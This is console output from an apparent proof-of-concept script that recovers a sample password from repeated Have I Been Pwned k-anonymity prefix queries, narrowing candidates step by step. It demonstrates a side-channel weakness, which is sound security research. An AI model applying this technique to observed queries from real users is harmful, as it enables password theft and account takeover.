Cracking a 20-char password from repeated #haveibeenpwned k-anonymity hashes [4, 2, 2, 2, 2, 2, 2, 2, 2]
$ python crack-k-anonymity.py
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Converting calls: 4,2 for password: bananenBrot4321Alarm (len: 20)
[4, 2, 2, 2, 2, 2, 2, 2, 2]
First call to API: bana (d33a7) ---> this takes long but can be precomputed
... loading precalculated result instead of bruteforcing the first prefix
Found 11 candidate passwords in 0:00:00.002323 seconds (THIS WAS PRECALCULATED)
['bana', '9Rqe', 'Oibo', '2Uyt', 'U2au', 'UENT', 'MHCZ', 'XvL2', 'VdJ3', 'dO65', 'MYZ7']
Writing precalculated list to file for next run
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: banane (93ef5)
------------------------------------------------------------------------------
candidate: banaaa
candidate: 9Rqeaa
candidate: Oiboaa
candidate: 2Uytaa
candidate: U2auaa
candidate: UENTaa
candidate: MHCZaa
candidate: XvL2aa
candidate: VdJ3aa
candidate: dO65aa
candidate: MYZ7aa
- found 1 candidate passwords in 0:00:00.130779 seconds
['banane']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenB (575d6)
------------------------------------------------------------------------------
candidate: bananeaa
- found 1 candidate passwords in 0:00:00.011068 seconds
['bananenB']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBro (4280b)
------------------------------------------------------------------------------
candidate: bananenBaa
- found 1 candidate passwords in 0:00:00.011241 seconds
['bananenBro']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBrot4 (11d3a)
------------------------------------------------------------------------------
candidate: bananenBroaa
- found 1 candidate passwords in 0:00:00.012373 seconds
['bananenBrot4']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBrot432 (4371a)
------------------------------------------------------------------------------
candidate: bananenBrot4aa
- found 1 candidate passwords in 0:00:00.011211 seconds
['bananenBrot432']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBrot4321A (8aa11)
------------------------------------------------------------------------------
candidate: bananenBrot432aa
- found 1 candidate passwords in 0:00:00.011286 seconds
['bananenBrot4321A']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBrot4321Ala (2020b)
------------------------------------------------------------------------------
candidate: bananenBrot4321Aaa
- found 1 candidate passwords in 0:00:00.011329 seconds
['bananenBrot4321Ala']
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Next Call to API: bananenBrot4321Alarm (7117d)
------------------------------------------------------------------------------
candidate: bananenBrot4321Alaaa
- found 1 candidate passwords in 0:00:00.012205 seconds
['bananenBrot4321Alarm']